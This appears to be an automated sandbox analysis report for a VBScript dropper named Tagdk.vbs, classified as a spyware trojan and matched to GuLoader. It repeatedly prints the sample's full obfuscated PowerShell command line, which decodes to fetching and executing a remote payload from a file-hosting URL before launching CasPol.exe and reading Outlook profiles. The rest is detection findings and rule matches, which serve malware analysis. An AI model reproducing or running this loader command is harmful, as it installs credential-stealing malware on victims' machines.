            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " function Propje9 ([String]$Hjsp){$Avancereno=5;For($Genne=4; $Genne -lt $Hjsp.Length-1; $Genne+=$Avancereno){$Mdeaftner=$Hjsp.Substring( $Genne, 1);$Skotskterr+=$Mdeaftner};$Skotskterr;}$Abonnemen=Propje9 'AntehEnsit BegtMonopBucksTryn:Admi/ For/IndudNonurRekiiAfstvLcsyeSubo.lattgSmitoDigeoDiscgDatalHarpe fug. CoccIssuoEpicmPoly/ intutowecLong?diureTranx TyppPampointer PhitFutu=SymfdKasboBerawBundnWarll EntoCommaNonsdGtes&JuniiOmnidGrns=Unfr1UdvadBenzsSamm7FremuskrnXLoosoSpdbiDemoivargNCuspl FsfQElecLMathUEfteVcullaRufiO Hal6ForskKirigfrer1squa9StifnAlimcNumifBagff Rhiq Refe Gge2 Resg FlaoUncamKore0Giga ';$Skotskterr01=Propje9 'Prini SpyeUnquxSurp ';$Homem163 = Propje9 'Atte\Makrs Apiy OvesPrepwagreoAuthwKitt6Forb4Nond\NonbWRushiWaganUnded Svio SauwDrags CacPDepuoPrydwForfeLignrGrsgSSocihErotefisklPastlMemo\KnstvDete1Famo. Bal0 Tim\Backpdatio pegw Seme BikrRheasLobehBanke Skalsolal Sna.BenzeGavsxGrapeCarn ';. ($Skotskterr01) (Propje9 'Bran$SymfRMusiaVoldtCigaiParto MooeMakur UdvaFearvPolai Gra2Supe=Inte$Lavre GngnSippv Gad:Coppw Afsi GednDyredHegliIngerUdet ') ; . ($Skotskterr01) (Propje9 'Bort$ FabHOveroIdeam MoneGummmrung1 Tre6Merp3Apop=mold$GaelRApopaGrantLovriIdyloEkvieAalerSupra BeavSupeiTamp2Cadd+Godt$SemoHBurso CysmMulteAktemMess1 For6Zine3Gobb ') ; . ($Skotskterr01) (Propje9 'Hage$MonoHRedaeFeritAeroeAnterSadeoClampCand Rede=Bour Komm(Dame(TolegPrsiw Flnm ScaiPrin Multw EksiHeatnTeat3Cloi2Narr_SkylpAnatrQuaroCompcDanieFuglsMordsNonv Rei-AuktFTsem PrecPDruirfyrsoSpydcCryoePaabsIcons GloI IdrdOuts=Mist$Tyra{KhouPTranIStilDSjak}Phal)form. OxiCRomao KlimGesvm Nona TronSelvdWedlL UnciWintnDybkeGulc) Nar Ker-insesFidup Hvil Radi QuatLaqu Unnu[Sukkc ModhLafgaSpoorEndu]Flyv3Klav4Deat '); & ($Skotskterr01) (Propje9 'Deaf$ DrmSUnada colmNatsm fese ThanFisc Kol=Ence Tids$MongHViateCoevtRedeeDatar SkroCentp Sys[cons$DigtH Pine NevtSuppeStjerJocaoprimp Unc.AliecAntio TypufirenAndetSkar- Vet2Beas]Wond '); & ($Skotskterr01) (Propje9 ' Alk$meloD Mina SubtUnedaSkva= Far(OverTGlyceGrensBudgt Pre-UnpePChimaPaattCraihEnhe Wan$vaerHHaanoDestmDiatePetnmNske1Fase6Trac3Mech) Enc Unop-LavkAMarknNoncd Ant Unpu(Kiss[ AfpIBactnPunktNbetPStiltHelprBear]Bank:Unin: DklsPartiEmpizMuree Sun Ele-runeeSkryq Fly Rive8 Ver)Bava ') ;if ($Data) {.$Homem163 $Sammen;} else {;$Skotskterr00=Propje9 'RuskSCarbtStilaStaarCoddtAkti-PitiBskatiDalgtRisosCaprTTyngroracaElfen VinsLawnfKlkeeKalirMali Ang- CatS TwioRecouFiltrovalcRenmeGoos Cerv$DeclAArtib Speo ClenSystnHallePancm Yace VognUnse Laes- LarD Fame BetsJavat TmriLkkenDagcaKinitAnveiFolioDundnstad Repu$ DisR Sena StatAarsiArtfoSteneVincrPrecaHejev HomiMeli2Have '; .($Skotskterr01) (Propje9 'Sang$tranRMewlaOxydtReceiSagsoHushe Pror Jeka ColvhvisiRapp2Afgr=Stri$HarzeDobbnUdvivposi:SkanaLnpapPyelpElvrdKammaSergtCatdaHyri ') ; & Jump to behavior
            Very long command line found
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4744
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 4744
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4744Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 4744Jump to behavior
            Windows Scripting host queries suspicious COM object (likely to drop second stage)
            Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Source: Process Memory Space: powershell.exe PID: 6876, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04A8C8D84_2_04A8C8D8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04A8D1A84_2_04A8D1A8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04A8C5904_2_04A8C590
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_078B64604_2_078B6460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01159BE29_2_01159BE2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01154A889_2_01154A88
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01153E709_2_01153E70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0115CEA09_2_0115CEA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_011541B89_2_011541B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_035EAB119_2_035EAB11
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_22852B089_2_22852B08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_22859B789_2_22859B78
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_228500409_2_22850040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_22858F129_2_22858F12
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_22853F589_2_22853F58
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_228557789_2_22855778
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_2285DD3D9_2_2285DD3D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_22854A009_2_22854A00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_2285323F9_2_2285323F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_228550809_2_22855080
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_2285BD909_2_2285BD90
            Source: Tagdk.vbsInitial sample: Strings found which are bigger than 50
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Tagdk.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " function Propje9 ([String]$Hjsp){$Avancereno=5;For($Genne=4; $Genne -lt $Hjsp.Length-1; $Genne+=$Avancereno){$Mdeaftner=$Hjsp.Substring( $Genne, 1);$Skotskterr+=$Mdeaftner};$Skotskterr;}$Abonnemen=Propje9 'AntehEnsit BegtMonopBucksTryn:Admi/ For/IndudNonurRekiiAfstvLcsyeSubo.lattgSmitoDigeoDiscgDatalHarpe fug. CoccIssuoEpicmPoly/ intutowecLong?diureTranx TyppPampointer PhitFutu=SymfdKasboBerawBundnWarll EntoCommaNonsdGtes&JuniiOmnidGrns=Unfr1UdvadBenzsSamm7FremuskrnXLoosoSpdbiDemoivargNCuspl FsfQElecLMathUEfteVcullaRufiO Hal6ForskKirigfrer1squa9StifnAlimcNumifBagff Rhiq Refe Gge2 Resg FlaoUncamKore0Giga ';$Skotskterr01=Propje9 'Prini SpyeUnquxSurp ';$Homem163 = Propje9 'Atte\Makrs Apiy OvesPrepwagreoAuthwKitt6Forb4Nond\NonbWRushiWaganUnded Svio SauwDrags CacPDepuoPrydwForfeLignrGrsgSSocihErotefisklPastlMemo\KnstvDete1Famo. Bal0 Tim\Backpdatio pegw Seme BikrRheasLobehBanke Skalsolal Sna.BenzeGavsxGrapeCarn ';. ($Skotskterr01) (Propje9 'Bran$SymfRMusiaVoldtCigaiParto MooeMakur UdvaFearvPolai Gra2Supe=Inte$Lavre GngnSippv Gad:Coppw Afsi GednDyredHegliIngerUdet ') ; . ($Skotskterr01) (Propje9 'Bort$ FabHOveroIdeam MoneGummmrung1 Tre6Merp3Apop=mold$GaelRApopaGrantLovriIdyloEkvieAalerSupra BeavSupeiTamp2Cadd+Godt$SemoHBurso CysmMulteAktemMess1 For6Zine3Gobb ') ; . ($Skotskterr01) (Propje9 'Hage$MonoHRedaeFeritAeroeAnterSadeoClampCand Rede=Bour Komm(Dame(TolegPrsiw Flnm ScaiPrin Multw EksiHeatnTeat3Cloi2Narr_SkylpAnatrQuaroCompcDanieFuglsMordsNonv Rei-AuktFTsem PrecPDruirfyrsoSpydcCryoePaabsIcons GloI IdrdOuts=Mist$Tyra{KhouPTranIStilDSjak}Phal)form. OxiCRomao KlimGesvm Nona TronSelvdWedlL UnciWintnDybkeGulc) Nar Ker-insesFidup Hvil Radi QuatLaqu Unnu[Sukkc ModhLafgaSpoorEndu]Flyv3Klav4Deat '); & ($Skotskterr01) (Propje9 'Deaf$ DrmSUnada colmNatsm fese ThanFisc Kol=Ence Tids$MongHViateCoevtRedeeDatar SkroCentp Sys[cons$DigtH Pine NevtSuppeStjerJocaoprimp Unc.AliecAntio TypufirenAndetSkar- Vet2Beas]Wond '); & ($Skotskterr01) (Propje9 ' Alk$meloD Mina SubtUnedaSkva= Far(OverTGlyceGrensBudgt Pre-UnpePChimaPaattCraihEnhe Wan$vaerHHaanoDestmDiatePetnmNske1Fase6Trac3Mech) Enc Unop-LavkAMarknNoncd Ant Unpu(Kiss[ AfpIBactnPunktNbetPStiltHelprBear]Bank:Unin: DklsPartiEmpizMuree Sun Ele-runeeSkryq Fly Rive8 Ver)Bava ') ;if ($Data) {.$Homem163 $Sammen;} else {;$Skotskterr00=Propje9 'RuskSCarbtStilaStaarCoddtAkti-PitiBskatiDalgtRisosCaprTTyngroracaElfen VinsLawnfKlkeeKalirMali Ang- CatS TwioRecouFiltrovalcRenmeGoos Cerv$DeclAArtib Speo ClenSystnHallePancm Yace VognUnse Laes- LarD Fame BetsJavat TmriLkkenDagcaKinitAnveiFolioDundnstad Repu$ DisR Sena StatAarsiArtfoSteneVincrPrecaHejev HomiMeli2Have '; .($Skotskterr01) (Propje9 'Sang$tranRMewlaOxydtReceiSagsoHushe Pror Jeka ColvhvisiRapp2Afgr=Stri$HarzeDobbnUdvivposi:SkanaLnpapPyelpElvrdKammaSergtCatdaHyri ') ; &
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" " function Propje9 ([String]$Hjsp){$Avancereno=5;For($Genne=4; $Genne -lt $Hjsp.Length-1; $Genne+=$Avancereno){$Mdeaftner=$Hjsp.Substring( $Genne, 1);$Skotskterr+=$Mdeaftner};$Skotskterr;}$Abonnemen=Propje9 'AntehEnsit BegtMonopBucksTryn:Admi/ For/IndudNonurRekiiAfstvLcsyeSubo.lattgSmitoDigeoDiscgDatalHarpe fug. CoccIssuoEpicmPoly/ intutowecLong?diureTranx TyppPampointer PhitFutu=SymfdKasboBerawBundnWarll EntoCommaNonsdGtes&JuniiOmnidGrns=Unfr1UdvadBenzsSamm7FremuskrnXLoosoSpdbiDemoivargNCuspl FsfQElecLMathUEfteVcullaRufiO Hal6ForskKirigfrer1squa9StifnAlimcNumifBagff Rhiq Refe Gge2 Resg FlaoUncamKore0Giga ';$Skotskterr01=Propje9 'Prini SpyeUnquxSurp ';$Homem163 = Propje9 'Atte\Makrs Apiy OvesPrepwagreoAuthwKitt6Forb4Nond\NonbWRushiWaganUnded Svio SauwDrags CacPDepuoPrydwForfeLignrGrsgSSocihErotefisklPastlMemo\KnstvDete1Famo. Bal0 Tim\Backpdatio pegw Seme BikrRheasLobehBanke Skalsolal Sna.BenzeGavsxGrapeCarn ';. ($Skotskterr01) (Propje9 'Bran$SymfRMusiaVoldtCigaiParto MooeMakur UdvaFearvPolai Gra2Supe=Inte$Lavre GngnSippv Gad:Coppw Afsi GednDyredHegliIngerUdet ') ; . ($Skotskterr01) (Propje9 'Bort$ FabHOveroIdeam MoneGummmrung1 Tre6Merp3Apop=mold$GaelRApopaGrantLovriIdyloEkvieAalerSupra BeavSupeiTamp2Cadd+Godt$SemoHBurso CysmMulteAktemMess1 For6Zine3Gobb ') ; . ($Skotskterr01) (Propje9 'Hage$MonoHRedaeFeritAeroeAnterSadeoClampCand Rede=Bour Komm(Dame(TolegPrsiw Flnm ScaiPrin Multw EksiHeatnTeat3Cloi2Narr_SkylpAnatrQuaroCompcDanieFuglsMordsNonv Rei-AuktFTsem PrecPDruirfyrsoSpydcCryoePaabsIcons GloI IdrdOuts=Mist$Tyra{KhouPTranIStilDSjak}Phal)form. OxiCRomao KlimGesvm Nona TronSelvdWedlL UnciWintnDybkeGulc) Nar Ker-insesFidup Hvil Radi QuatLaqu Unnu[Sukkc ModhLafgaSpoorEndu]Flyv3Klav4Deat '); & ($Skotskterr01) (Propje9 'Deaf$ DrmSUnada colmNatsm fese ThanFisc Kol=Ence Tids$MongHViateCoevtRedeeDatar SkroCentp Sys[cons$DigtH Pine NevtSuppeStjerJocaoprimp Unc.AliecAntio TypufirenAndetSkar- Vet2Beas]Wond '); & ($Skotskterr01) (Propje9 ' Alk$meloD Mina SubtUnedaSkva= Far(OverTGlyceGrensBudgt Pre-UnpePChimaPaattCraihEnhe Wan$vaerHHaanoDestmDiatePetnmNske1Fase6Trac3Mech) Enc Unop-LavkAMarknNoncd Ant Unpu(Kiss[ AfpIBactnPunktNbetPStiltHelprBear]Bank:Unin: DklsPartiEmpizMuree Sun Ele-runeeSkryq Fly Rive8 Ver)Bava ') ;if ($Data) {.$Homem163 $Sammen;} else {;$Skotskterr00=Propje9 'RuskSCarbtStilaStaarCoddtAkti-PitiBskatiDalgtRisosCaprTTyngroracaElfen VinsLawnfKlkeeKalirMali Ang- CatS TwioRecouFiltrovalcRenmeGoos Cerv$DeclAArtib Speo ClenSystnHallePancm Yace VognUnse Laes- LarD Fame BetsJavat TmriLkkenDagcaKinitAnveiFolioDundnstad Repu$ DisR Sena StatAarsiArtfoSteneVincrPrecaHejev HomiMeli2Have '; .($Skotskterr01) (Propje9 'Sang$tranRMewlaOxydtReceiSagsoHushe Pror Jeka ColvhvisiRapp2Afgr=Stri$HarzeDobbnUdvivposi:SkanaLnpapPyelpElvrdKammaSergtCatdaHyri ') ; &
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " function Propje9 ([String]$Hjsp){$Avancereno=5;For($Genne=4; $Genne -lt $Hjsp.Length-1; $Genne+=$Avancereno){$Mdeaftner=$Hjsp.Substring( $Genne, 1);$Skotskterr+=$Mdeaftner};$Skotskterr;}$Abonnemen=Propje9 'AntehEnsit BegtMonopBucksTryn:Admi/ For/IndudNonurRekiiAfstvLcsyeSubo.lattgSmitoDigeoDiscgDatalHarpe fug. CoccIssuoEpicmPoly/ intutowecLong?diureTranx TyppPampointer PhitFutu=SymfdKasboBerawBundnWarll EntoCommaNonsdGtes&JuniiOmnidGrns=Unfr1UdvadBenzsSamm7FremuskrnXLoosoSpdbiDemoivargNCuspl FsfQElecLMathUEfteVcullaRufiO Hal6ForskKirigfrer1squa9StifnAlimcNumifBagff Rhiq Refe Gge2 Resg FlaoUncamKore0Giga ';$Skotskterr01=Propje9 'Prini SpyeUnquxSurp ';$Homem163 = Propje9 'Atte\Makrs Apiy OvesPrepwagreoAuthwKitt6Forb4Nond\NonbWRushiWaganUnded Svio SauwDrags CacPDepuoPrydwForfeLignrGrsgSSocihErotefisklPastlMemo\KnstvDete1Famo. Bal0 Tim\Backpdatio pegw Seme BikrRheasLobehBanke Skalsolal Sna.BenzeGavsxGrapeCarn ';. ($Skotskterr01) (Propje9 'Bran$SymfRMusiaVoldtCigaiParto MooeMakur UdvaFearvPolai Gra2Supe=Inte$Lavre GngnSippv Gad:Coppw Afsi GednDyredHegliIngerUdet ') ; . ($Skotskterr01) (Propje9 'Bort$ FabHOveroIdeam MoneGummmrung1 Tre6Merp3Apop=mold$GaelRApopaGrantLovriIdyloEkvieAalerSupra BeavSupeiTamp2Cadd+Godt$SemoHBurso CysmMulteAktemMess1 For6Zine3Gobb ') ; . ($Skotskterr01) (Propje9 'Hage$MonoHRedaeFeritAeroeAnterSadeoClampCand Rede=Bour Komm(Dame(TolegPrsiw Flnm ScaiPrin Multw EksiHeatnTeat3Cloi2Narr_SkylpAnatrQuaroCompcDanieFuglsMordsNonv Rei-AuktFTsem PrecPDruirfyrsoSpydcCryoePaabsIcons GloI IdrdOuts=Mist$Tyra{KhouPTranIStilDSjak}Phal)form. OxiCRomao KlimGesvm Nona TronSelvdWedlL UnciWintnDybkeGulc) Nar Ker-insesFidup Hvil Radi QuatLaqu Unnu[Sukkc ModhLafgaSpoorEndu]Flyv3Klav4Deat '); & ($Skotskterr01) (Propje9 'Deaf$ DrmSUnada colmNatsm fese ThanFisc Kol=Ence Tids$MongHViateCoevtRedeeDatar SkroCentp Sys[cons$DigtH Pine NevtSuppeStjerJocaoprimp Unc.AliecAntio TypufirenAndetSkar- Vet2Beas]Wond '); & ($Skotskterr01) (Propje9 ' Alk$meloD Mina SubtUnedaSkva= Far(OverTGlyceGrensBudgt Pre-UnpePChimaPaattCraihEnhe Wan$vaerHHaanoDestmDiatePetnmNske1Fase6Trac3Mech) Enc Unop-LavkAMarknNoncd Ant Unpu(Kiss[ AfpIBactnPunktNbetPStiltHelprBear]Bank:Unin: DklsPartiEmpizMuree Sun Ele-runeeSkryq Fly Rive8 Ver)Bava ') ;if ($Data) {.$Homem163 $Sammen;} else {;$Skotskterr00=Propje9 'RuskSCarbtStilaStaarCoddtAkti-PitiBskatiDalgtRisosCaprTTyngroracaElfen VinsLawnfKlkeeKalirMali Ang- CatS TwioRecouFiltrovalcRenmeGoos Cerv$DeclAArtib Speo ClenSystnHallePancm Yace VognUnse Laes- LarD Fame BetsJavat TmriLkkenDagcaKinitAnveiFolioDundnstad Repu$ DisR Sena StatAarsiArtfoSteneVincrPrecaHejev HomiMeli2Have '; .($Skotskterr01) (Propje9 'Sang$tranRMewlaOxydtReceiSagsoHushe Pror Jeka ColvhvisiRapp2Afgr=Stri$HarzeDobbnUdvivposi:SkanaLnpapPyelpElvrdKammaSergtCatdaHyri ') ; & Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" " function Propje9 ([String]$Hjsp){$Avancereno=5;For($Genne=4; $Genne -lt $Hjsp.Length-1; $Genne+=$Avancereno){$Mdeaftner=$Hjsp.Substring( $Genne, 1);$Skotskterr+=$Mdeaftner};$Skotskterr;}$Abonnemen=Propje9 'AntehEnsit BegtMonopBucksTryn:Admi/ For/IndudNonurRekiiAfstvLcsyeSubo.lattgSmitoDigeoDiscgDatalHarpe fug. CoccIssuoEpicmPoly/ intutowecLong?diureTranx TyppPampointer PhitFutu=SymfdKasboBerawBundnWarll EntoCommaNonsdGtes&JuniiOmnidGrns=Unfr1UdvadBenzsSamm7FremuskrnXLoosoSpdbiDemoivargNCuspl FsfQElecLMathUEfteVcullaRufiO Hal6ForskKirigfrer1squa9StifnAlimcNumifBagff Rhiq Refe Gge2 Resg FlaoUncamKore0Giga ';$Skotskterr01=Propje9 'Prini SpyeUnquxSurp ';$Homem163 = Propje9 'Atte\Makrs Apiy OvesPrepwagreoAuthwKitt6Forb4Nond\NonbWRushiWaganUnded Svio SauwDrags CacPDepuoPrydwForfeLignrGrsgSSocihErotefisklPastlMemo\KnstvDete1Famo. Bal0 Tim\Backpdatio pegw Seme BikrRheasLobehBanke Skalsolal Sna.BenzeGavsxGrapeCarn ';. ($Skotskterr01) (Propje9 'Bran$SymfRMusiaVoldtCigaiParto MooeMakur UdvaFearvPolai Gra2Supe=Inte$Lavre GngnSippv Gad:Coppw Afsi GednDyredHegliIngerUdet ') ; . ($Skotskterr01) (Propje9 'Bort$ FabHOveroIdeam MoneGummmrung1 Tre6Merp3Apop=mold$GaelRApopaGrantLovriIdyloEkvieAalerSupra BeavSupeiTamp2Cadd+Godt$SemoHBurso CysmMulteAktemMess1 For6Zine3Gobb ') ; . ($Skotskterr01) (Propje9 'Hage$MonoHRedaeFeritAeroeAnterSadeoClampCand Rede=Bour Komm(Dame(TolegPrsiw Flnm ScaiPrin Multw EksiHeatnTeat3Cloi2Narr_SkylpAnatrQuaroCompcDanieFuglsMordsNonv Rei-AuktFTsem PrecPDruirfyrsoSpydcCryoePaabsIcons GloI IdrdOuts=Mist$Tyra{KhouPTranIStilDSjak}Phal)form. OxiCRomao KlimGesvm Nona TronSelvdWedlL UnciWintnDybkeGulc) Nar Ker-insesFidup Hvil Radi QuatLaqu Unnu[Sukkc ModhLafgaSpoorEndu]Flyv3Klav4Deat '); & ($Skotskterr01) (Propje9 'Deaf$ DrmSUnada colmNatsm fese ThanFisc Kol=Ence Tids$MongHViateCoevtRedeeDatar SkroCentp Sys[cons$DigtH Pine NevtSuppeStjerJocaoprimp Unc.AliecAntio TypufirenAndetSkar- Vet2Beas]Wond '); & ($Skotskterr01) (Propje9 ' Alk$meloD Mina SubtUnedaSkva= Far(OverTGlyceGrensBudgt Pre-UnpePChimaPaattCraihEnhe Wan$vaerHHaanoDestmDiatePetnmNske1Fase6Trac3Mech) Enc Unop-LavkAMarknNoncd Ant Unpu(Kiss[ AfpIBactnPunktNbetPStiltHelprBear]Bank:Unin: DklsPartiEmpizMuree Sun Ele-runeeSkryq Fly Rive8 Ver)Bava ') ;if ($Data) {.$Homem163 $Sammen;} else {;$Skotskterr00=Propje9 'RuskSCarbtStilaStaarCoddtAkti-PitiBskatiDalgtRisosCaprTTyngroracaElfen VinsLawnfKlkeeKalirMali Ang- CatS TwioRecouFiltrovalcRenmeGoos Cerv$DeclAArtib Speo ClenSystnHallePancm Yace VognUnse Laes- LarD Fame BetsJavat TmriLkkenDagcaKinitAnveiFolioDundnstad Repu$ DisR Sena StatAarsiArtfoSteneVincrPrecaHejev HomiMeli2Have '; .($Skotskterr01) (Propje9 'Sang$tranRMewlaOxydtReceiSagsoHushe Pror Jeka ColvhvisiRapp2Afgr=Stri$HarzeDobbnUdvivposi:SkanaLnpapPyelpElvrdKammaSergtCatdaHyri ') ; & Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exeJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=604
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6876
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ufikyduv.e2p.ps1Jump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.evad.winVBS@8/6@4/3
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3104:120:WilError_03
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Tagdk.vbs"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior

            Data Obfuscation

            barindex
            VBScript performs obfuscated calls to suspicious functions
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powerShell " function Propje9 ([String]$Hjsp){$Avancereno=5;For($Genne=4; $Genne -lt $Hjsp.Length-1; $Genne+=$Ava", "0")
            Yara detected GuLoader
            Source: Yara matchFile source: 00000004.00000002.1957028121.000000000B3A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1956924821.0000000008B90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1945999546.0000000005E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Suspicious powershell command line found
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " function Propje9 ([String]$Hjsp){$Avancereno=5;For($Genne=4; $Genne -lt $Hjsp.Length-1; $Genne+=$Avancereno){$Mdeaftner=$Hjsp.Substring( $Genne, 1);$Skotskterr+=$Mdeaftner};$Skotskterr;}$Abonnemen=Propje9 'AntehEnsit BegtMonopBucksTryn:Admi/ For/IndudNonurRekiiAfstvLcsyeSubo.lattgSmitoDigeoDiscgDatalHarpe fug. CoccIssuoEpicmPoly/ intutowecLong?diureTranx TyppPampointer PhitFutu=SymfdKasboBerawBundnWarll EntoCommaNonsdGtes&JuniiOmnidGrns=Unfr1UdvadBenzsSamm7FremuskrnXLoosoSpdbiDemoivargNCuspl FsfQElecLMathUEfteVcullaRufiO Hal6ForskKirigfrer1squa9StifnAlimcNumifBagff Rhiq Refe Gge2 Resg FlaoUncamKore0Giga ';$Skotskterr01=Propje9 'Prini SpyeUnquxSurp ';$Homem163 = Propje9 'Atte\Makrs Apiy OvesPrepwagreoAuthwKitt6Forb4Nond\NonbWRushiWaganUnded Svio SauwDrags 